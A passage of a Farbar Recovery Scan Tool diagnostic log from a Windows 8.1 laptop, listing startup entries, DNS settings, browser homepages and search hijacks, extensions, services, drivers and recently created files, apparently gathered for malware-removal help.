HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\Run: [GoogleChromeAutoLaunch_C53FAD65C2D6926885C453276F0F49A1] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [746648 2016-02-17] (Google Inc.)
HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\MountPoints2: {bfef5019-d8ba-11e5-8272-d85de287d87e} - "D:\windows\AutoRun.exe"
BootExecute: autocheck autochk * sdnclean64.exe
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\Parameters: [NameServer] 82.163.142.7 95.211.158.134
Tcpip\..\Interfaces\{2B499AA0-D03A-459F-AF7B-E066FC873886}: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{973F3F7C-2B68-428F-A390-4A495C50EDD8}: [DhcpNameServer] 82.163.142.7
Tcpip\..\Interfaces\{B1997D4E-969C-42FF-B8F2-0B5104AA2E37}: [DhcpNameServer] 82.163.142.7
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_popjar_16_06_ssg02&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzzyB0DzzyB0D0F0AtC0EtN0D0Tzu0StCyEzyzytN1L2XzutAtFtCzztFtDtFtCtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyD0F0AyC0A0ByDyBtGyCtA0F0DtG0Czy0B0FtGyBtC0EtDtGtDyCzyzztAzyzz0FtDyE0F0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0F0D0B0FyByBtDyDtGyDyDzytAtGyE0E0DyEtG0AtDyByCtG0DtByD0A0ByEzytAtDyDzzyD2QtN0A0LzuyE%26cr%3D450508380%26a%3Dwncy_popjar_16_06_ssg02%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BConnected
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_popjar_16_06_ssg02&param1=1&param2=f%3D1%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzzyB0DzzyB0D0F0AtC0EtN0D0Tzu0StCyEzyzytN1L2XzutAtFtCzztFtDtFtCtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyD0F0AyC0A0ByDyBtGyCtA0F0DtG0Czy0B0FtGyBtC0EtDtGtDyCzyzztAzyzz0FtDyE0F0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0F0D0B0FyByBtDyDtGyDyDzytAtGyE0E0DyEtG0AtDyByCtG0DtByD0A0ByEzytAtDyDzzyD2QtN0A0LzuyE%26cr%3D450508380%26a%3Dwncy_popjar_16_06_ssg02%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BConnected
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT14/1
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://g.msn.com/HPNOT14/1
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,First Home Page = hxxp://g.msn.com/HPNOT14/1
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT14/1
HKU\S-1-5-21-4258770641-917365270-2992294631-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/
HKU\S-1-5-21-4258770641-917365270-2992294631-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT14/1
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_popjar_16_06_ssg02&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzzyB0DzzyB0D0F0AtC0EtN0D0Tzu0StCyEzyzytN1L2XzutAtFtCzztFtDtFtCtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyD0F0AyC0A0ByDyBtGyCtA0F0DtG0Czy0B0FtGyBtC0EtDtGtDyCzyzztAzyzz0FtDyE0F0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0F0D0B0FyByBtDyDtGyDyDzytAtGyE0E0DyEtG0AtDyByCtG0DtByD0A0ByEzytAtDyDzzyD2QtN0A0LzuyE%26cr%3D450508380%26a%3Dwncy_popjar_16_06_ssg02%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BConnected&p={searchTerms}
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_popjar_16_06_ssg02&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzzyB0DzzyB0D0F0AtC0EtN0D0Tzu0StCyEzyzytN1L2XzutAtFtCzztFtDtFtCtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyD0F0AyC0A0ByDyBtGyCtA0F0DtG0Czy0B0FtGyBtC0EtDtGtDyCzyzztAzyzz0FtDyE0F0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0F0D0B0FyByBtDyDtGyDyDzytAtGyE0E0DyEtG0AtDyByCtG0DtByD0A0ByEzytAtDyDzzyD2QtN0A0LzuyE%26cr%3D450508380%26a%3Dwncy_popjar_16_06_ssg02%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BConnected&p={searchTerms}
SearchScopes: HKLM -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL =
SearchScopes: HKLM-x32 -> {5D459A9E-3E68-439C-B3C7-036F3B49576B} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKU\S-1-5-21-4258770641-917365270-2992294631-1001 -> {5D459A9E-3E68-439C-B3C7-036F3B49576B} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll => No File
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2015-12-20] (Hewlett-Packard Company)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\mcafee\msc\McSnIePl64.dll [2016-01-08] (McAfee, Inc.)
Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\msc\McSnIePl.dll [2016-01-08] (McAfee, Inc.)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
FireFox:
========
FF ProfilePath: C:\Users\Fawn\AppData\Roaming\Mozilla\Firefox\Profiles\jhz1k2y6.default
FF NewTab: about:newtab
FF DefaultSearchEngine: Search Provided by Yahoo
FF DefaultSearchEngine.US: Search Provided by Yahoo
FF SelectedSearchEngine: Search Provided by Yahoo
FF Homepage: hxxps://www.google.com/?gws_rd=ssl
about:preferences
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2016-01-08] ()
FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL [2016-01-08] ()
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-03] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-03] (Google Inc.)
FF Plugin HKU\S-1-5-21-4258770641-917365270-2992294631-1001: @citrixonline.com/appdetectorplugin -> C:\Users\Fawn\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2016-03-03] (Citrix Online)
FF Extension: Simple YouTube to MP3/MP4 Converter and Downloader - C:\Users\Fawn\AppData\Roaming\Mozilla\Firefox\Profiles\jhz1k2y6.default\Extensions\jid0-SQnwtgW1b8BsMB5PLV5WScEDWOjw@jetpack.xpi [2016-03-03]
FF Extension: Youtube MP3 Downloader using youtube-mp3.org - C:\Users\Fawn\AppData\Roaming\Mozilla\Firefox\Profiles\jhz1k2y6.default\Extensions\jid1-xKH0EoS44u1a2w@jetpack.xpi [2016-02-08]
FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK
FF Extension: McAfee Anti-Spam Thunderbird Extension - C:\Program Files\McAfee\MSK [2016-02-12] [not signed]
StartMenuInternet: FIREFOX.EXE - firefox.exe
Chrome:
=======
CHR HomePage: Default -> hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_popjar_16_06_ssg02&param1=1&param2=f%3D1%26b%3DChrome%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzzyB0DzzyB0D0F0AtC0EtN0D0Tzu0StCyEzyzytN1L2XzutAtFtCzztFtDtFtCtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyD0F0AyC0A0ByDyBtGyCtA0F0DtG0Czy0B0FtGyBtC0EtDtGtDyCzyzztAzyzz0FtDyE0F0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0F0D0B0FyByBtDyDtGyDyDzytAtGyE0E0DyEtG0AtDyByCtG0DtByD0A0ByEzytAtDyDzzyD2QtN0A0LzuyE%26cr%3D450508380%26a%3Dwncy_popjar_16_06_ssg02%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BConnected
CHR StartupUrls: Default -> "hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_popjar_16_06_ssg02&param1=1&param2=f%3D7%26b%3DChrome%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzzyB0DzzyB0D0F0AtC0EtN0D0Tzu0StCyEzyzytN1L2XzutAtFtCzztFtDtFtCtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyD0F0AyC0A0ByDyBtGyCtA0F0DtG0Czy0B0FtGyBtC0EtDtGtDyCzyzztAzyzz0FtDyE0F0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0F0D0B0FyByBtDyDtGyDyDzytAtGyE0E0DyEtG0AtDyByCtG0DtByD0A0ByEzytAtDyDzzyD2QtN0A0LzuyE%26cr%3D450508380%26a%3Dwncy_popjar_16_06_ssg02%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BConnected"
CHR DefaultSearchURL: Default -> hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_popjar_16_06_ssg02&param1=1&param2=f%3D4%26b%3DChrome%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzzyB0DzzyB0D0F0AtC0EtN0D0Tzu0StCyEzyzytN1L2XzutAtFtCzztFtDtFtCtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyD0F0AyC0A0ByDyBtGyCtA0F0DtG0Czy0B0FtGyBtC0EtDtGtDyCzyzztAzyzz0FtDyE0F0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0F0D0B0FyByBtDyDtGyDyDzytAtGyE0E0DyEtG0AtDyByCtG0DtByD0A0ByEzytAtDyDzzyD2QtN0A0LzuyE%26cr%3D450508380%26a%3Dwncy_popjar_16_06_ssg02%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BConnected&p={searchTerms}
CHR DefaultSearchKeyword: Default -> search provided by yahoo.com
CHR DefaultSuggestURL: Default -> {google:baseSuggestURL}search?client=chrome&hl={language}&q={searchTerms}
CHR Session Restore: Default -> is enabled.
CHR Profile: C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-11-23]
CHR Extension: (Google Docs) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-11-23]
CHR Extension: (Google Drive) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-23]
CHR Extension: (YouTube) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-23]
CHR Extension: (Google Search) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-23]
CHR Extension: (Page Eraser) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\ekofpchjmoalonajopdeegdappocgcmj [2016-03-04]
CHR Extension: (Test IE) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\eldlkpeoddgbmpjlnpfblfpgodnojfjl [2016-02-18]
CHR Extension: (Google Sheets) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-23]
CHR Extension: (Google Docs Offline) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-24]
CHR Extension: (Popup Blocker Pro) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\kiodaajmphnkcajieajajinghpejdjai [2016-03-03]
CHR Extension: (McAfee SECURE Safe Browsing) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\lkdiimaiohgpacfbgedcipmgigppaofn [2016-03-03]
CHR Extension: (FromDocToPDF) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk [2016-03-04]
CHR Extension: (BrowserStack Local) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\mfiddfehmfdojjfdpfngagldgaaafcfo [2016-01-28]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-11-23]
CHR Extension: (Gmail) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-11-23]
CHR Extension: (Open With Firefox) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\poeacjbaiakjnaepdjgggojcjoajakmd [2016-03-03]
==================== Services (Whitelisted) ========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S2 BcmBtRSupport; C:\Windows\system32\BtwRSupportService.exe [2251992 2013-11-13] (Broadcom Corporation.)
R2 DptfParticipantAcpiProcessorService; C:\Windows\system32\DptfParticipantProcessorService.exe [115656 2014-09-05] (Intel Corporation)
R2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [453520 2016-01-03] (McAfee, Inc.)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [26168 2015-12-20] (Hewlett-Packard Company)
R2 HPWMISVC; C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe [608520 2015-02-17] (Hewlett-Packard Development Company, L.P.)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [318568 2014-09-12] (Intel Corporation)
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe [733696 2013-07-01] (Intel(R) Corporation) [File not signed]
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\TXE Components\TCS\SocketHeciServer.exe [822232 2013-07-01] (Intel(R) Corporation)
R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [863448 2016-01-08] (McAfee, Inc.)
S3 McAWFwk; c:\Program Files\Common Files\McAfee\ActWiz\McAWFwk.exe [332528 2014-03-12] (McAfee, Inc.)
R2 mcbootdelaystartsvc; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [453520 2016-01-03] (McAfee, Inc.)
R2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\1.8.203.0\McCSPServiceHost.exe [1694152 2015-12-02] (McAfee, Inc.)
R2 McMPFSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [453520 2016-01-03] (McAfee, Inc.)
R2 McNaiAnn; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [453520 2016-01-03] (McAfee, Inc.)
S3 McODS; C:\Program Files\mcafee\VirusScan\mcods.exe [681680 2016-01-08] (McAfee, Inc.)
S4 McOobeSv2; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [453520 2016-01-03] (McAfee, Inc.)
R2 mcpltsvc; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [453520 2016-01-03] (McAfee, Inc.)
R2 McProxy; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [453520 2016-01-03] (McAfee, Inc.)
R3 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [234192 2015-11-18] (McAfee, Inc.)
R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [380896 2016-01-21] (McAfee, Inc.)
R2 mfevtp; C:\Windows\system32\mfevtps.exe [275368 2015-11-18] (McAfee, Inc.)
R2 MSK80Service; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [453520 2016-01-03] (McAfee, Inc.)
R2 PEFService; C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe [902112 2015-12-14] (Intel Security, Inc.)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [292568 2014-09-12] (Realtek Semiconductor)
R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [191728 2014-08-31] (Synaptics Incorporated)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [368632 2015-01-19] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2015-01-19] (Microsoft Corporation)
===================== Drivers (Whitelisted) ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S3 androidusb; C:\Windows\System32\Drivers\androidusb.sys [38424 2010-10-18] (Google Inc)
S3 AX88772; C:\Windows\system32\DRIVERS\ax88772.sys [113864 2013-07-18] (ASIX Electronics Corp.)
R3 bcbtums; C:\Windows\system32\drivers\bcbtums.sys [170712 2013-11-13] (Broadcom Corporation.)
R3 BCM43XX; C:\Windows\system32\DRIVERS\bcmwl63a.sys [7552760 2016-03-03] (Broadcom Corporation)
R3 cfwids; C:\Windows\System32\drivers\cfwids.sys [79248 2015-11-25] (McAfee, Inc.)
R3 DptfDevAcpiProc; C:\Windows\system32\DRIVERS\DptfDevAcpiProc.sys [198808 2014-09-05] (Intel Corporation)
S3 DptfDevDisplay; C:\Windows\System32\drivers\DptfDevDisplay.sys [70752 2014-09-05] (Intel Corporation)
S3 DptfDevDram; C:\Windows\System32\drivers\DptfDevDram.sys [145640 2014-09-05] (Intel Corporation)
S3 DptfDevFan; C:\Windows\System32\drivers\DptfDevFan.sys [50640 2014-09-05] (Intel Corporation)
R3 DptfDevGen; C:\Windows\system32\DRIVERS\DptfDevGen.sys [78504 2014-09-05] (Intel Corporation)
S3 DptfDevPch; C:\Windows\System32\drivers\DptfDevPch.sys [116752 2014-09-05] (Intel Corporation)
S3 DptfDevPower; C:\Windows\System32\drivers\DptfDevPower.sys [71808 2014-09-05] (Intel Corporation)
R3 DptfManager; C:\Windows\system32\DRIVERS\DptfManager.sys [493240 2014-09-05] (Intel Corporation)
S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
S3 HipShieldK; C:\Windows\System32\drivers\HipShieldK.sys [207208 2015-05-19] (McAfee, Inc.)
R0 MBI; C:\Windows\System32\drivers\MBI.sys [29464 2014-08-04] (Intel Corporation)
R3 mfeaack; C:\Windows\System32\drivers\mfeaack.sys [419624 2015-11-25] (McAfee, Inc.)
R3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [351144 2015-11-25] (McAfee, Inc.)
S0 mfeelamk; C:\Windows\System32\drivers\mfeelamk.sys [83096 2015-11-25] (McAfee, Inc.)
R3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [496368 2015-11-25] (McAfee, Inc.)
R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [846080 2015-11-25] (McAfee, Inc.)
R3 mfencbdc; C:\Windows\System32\DRIVERS\mfencbdc.sys [539496 2015-11-20] (McAfee, Inc.)
S3 mfencrk; C:\Windows\System32\DRIVERS\mfencrk.sys [109480 2015-11-20] (McAfee, Inc.)
R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [245096 2015-11-25] (McAfee, Inc.)
R3 RSP2STOR; C:\Windows\system32\DRIVERS\RtsP2Stor.sys [294104 2014-08-25] (Realtek Semiconductor Corp.)
S3 SmbDrv; C:\Windows\System32\drivers\Smb_driver_AMDASF.sys [30448 2014-08-31] (Synaptics Incorporated)
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [31472 2014-08-31] (Synaptics Incorporated)
R3 TXEIx64; C:\Windows\System32\drivers\TXEIx64.sys [88592 2014-01-15] (Intel Corporation)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [35320 2015-01-19] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [258368 2015-01-19] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114496 2015-01-19] (Microsoft Corporation)
R3 WirelessButtonDriver; C:\Windows\System32\drivers\WirelessButtonDriver64.sys [20800 2013-07-22] (Hewlett-Packard Development Company, L.P.)
S3 iscFlash; \??\C:\Windows\TEMP\7zS1773.tmp\iscflashx64.sys [X]
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One Month Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2016-03-04 10:04 - 2016-03-04 10:04 - 00025316 _____ C:\Users\Fawn\Desktop\FRST.txt
2016-03-04 10:02 - 2016-03-04 10:02 - 02374144 _____ (Farbar) C:\Users\Fawn\Desktop\FRST64 (2).exe
2016-03-04 09:21 - 2016-03-04 10:04 - 00000000 ____D C:\FRST
2016-03-04 09:11 - 2016-03-04 09:11 - 00000207 _____ C:\Windows\tweaking.com-regbackup-FAWNS-Windows-8.1-Connected-(64-bit).dat
2016-03-04 09:11 - 2016-03-04 09:11 - 00000000 ____D C:\RegBackup
2016-03-04 09:08 - 2016-03-04 09:08 - 00002258 _____ C:\Users\Public\Desktop\Tweaking.com - Registry Backup.lnk
2016-03-04 09:08 - 2016-03-04 09:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
2016-03-04 09:08 - 2016-03-04 09:08 - 00000000 ____D C:\Program Files (x86)\Tweaking.com
2016-03-04 09:07 - 2016-03-04 09:08 - 00016383 _____ C:\Windows\Tweaking.com - Registry Backup Setup Log.txt
2016-03-04 08:55 - 2016-03-04 09:03 - 00000000 ____D C:\AdwCleaner
2016-03-04 08:55 - 2016-03-04 08:55 - 01518592 _____ C:\Users\Fawn\Desktop\AdwCleaner.exe
2016-03-04 08:53 - 2016-03-04 08:54 - 04777232 _____ (Tweaking.com) C:\Users\Fawn\Desktop\tweaking.com_registry_backup_setup.exe
2016-03-03 19:10 - 2016-03-03 19:10 - 00000000 ____D C:\Users\Fawn\Documents\ProcAlyzer Dumps
2016-03-03 19:07 - 2016-02-08 14:17 - 00000824 _____ C:\Windows\system32\Drivers\etc\hosts.20160303-190723.backup
2016-03-03 17:58 - 2015-07-28 17:52 - 00821920 _____ (Safer-Networking Ltd. ) C:\Users\Public\Desktop\Post Win10 Spybot-install.exe
2016-03-03 17:56 - 2016-03-03 18:57 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy
2016-03-03 17:56 - 2016-03-03 17:56 - 00001410 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2016-03-03 17:56 - 2016-03-03 17:56 - 00001398 _____ C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
2016-03-03 17:56 - 2016-03-03 17:56 - 00000000 ____D C:\Windows\System32\Tasks\Safer-Networking
2016-03-03 17:56 - 2016-03-03 17:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2016-03-03 17:56 - 2013-09-20 10:49 - 00021040 _____ (Safer Networking Limited) C:\Windows\system32\sdnclean64.exe
2016-03-03 17:55 - 2016-03-03 18:01 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2016-03-03 17:53 - 2016-03-03 17:55 - 46525608 _____ (Safer-Networking Ltd. ) C:\Users\Fawn\Desktop\spybot-2.4.exe
2016-03-03 15:06 - 2016-03-03 15:06 - 00000000 ____D C:\Windows\LastGood.Tmp
2016-03-03 13:46 - 2016-03-03 14:10 - 00000000 ____D C:\Program Files (x86)\Citrix
2016-03-03 13:45 - 2016-03-03 15:31 - 00000000 ____D C:\Users\Fawn\AppData\Local\Citrix
2016-03-03 10:39 - 2016-03-04 02:55 - 00003846 _____ C:\Windows\System32\Tasks\Intel Security DAT Reputation (AMCore) periodic endpoint safety pulse
2016-02-27 19:21 - 2016-02-27 19:21 - 00086062 _____ C:\Users\Fawn\Downloads\q29.pdf
2016-02-27 19:21 - 2016-02-27 19:21 - 00086062 _____ C:\Users\Fawn\Downloads\q29 (1).pdf
2016-02-23 22:15 - 2016-03-03 11:15 - 00004020 _____ C:\Windows\System32\Tasks\Intel Security DAT Reputation (AMCore) Post DAT update endpoint safety pulse
2016-02-16 16:26 - 2016-02-16 16:26 - 00001449 _____ C:\Users\Fawn\Desktop\resume.txt
2016-02-16 16:23 - 2016-02-16 16:23 - 00000000 _____ C:\Users\Fawn\Desktop\New Text Document.txt
2016-02-16 16:18 - 2016-02-16 16:18 - 00002687 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Word Viewer 2003.lnk
2016-02-16 16:17 - 2016-02-16 16:17 - 00000000 ____D C:\Program Files (x86)\MSECache
2016-02-16 16:16 - 2016-02-16 16:16 - 25685128 _____ (Microsoft Corporation) C:\Users\Fawn\Downloads\wordview.exe
2016-02-10 11:44 - 2016-02-10 11:44 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee
2016-02-10 11:39 - 2016-02-10 11:39 - 00000000 ____D C:\ProgramData\Intel Security
2016-02-10 11:39 - 2016-02-10 11:39 - 00000000 ____D C:\Program Files\Common Files\Intel Security
2016-02-09 13:15 - 2016-02-09 13:27 - 00000000 ____D C:\Users\Fawn\Desktop\New folder (2)
2016-02-09 13:15 - 2016-02-09 13:15 - 00000000 ____D C:\Users\Fawn\Desktop\New folder (3)
2016-02-09 11:50 - 2016-02-06 02:48 - 25839104 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2016-02-09 11:50 - 2016-02-06 02:24 - 02887680 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2016-02-09 11:50 - 2016-02-06 02:01 - 20366848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2016-02-09 11:50 - 2016-02-06 01:43 - 02280448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2016-02-09 11:50 - 2016-02-06 01:32 - 14458368 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2016-02-09 11:50 - 2016-02-06 01:16 - 12857856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2016-02-09 11:50 - 2016-02-06 01:09 - 01547264 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
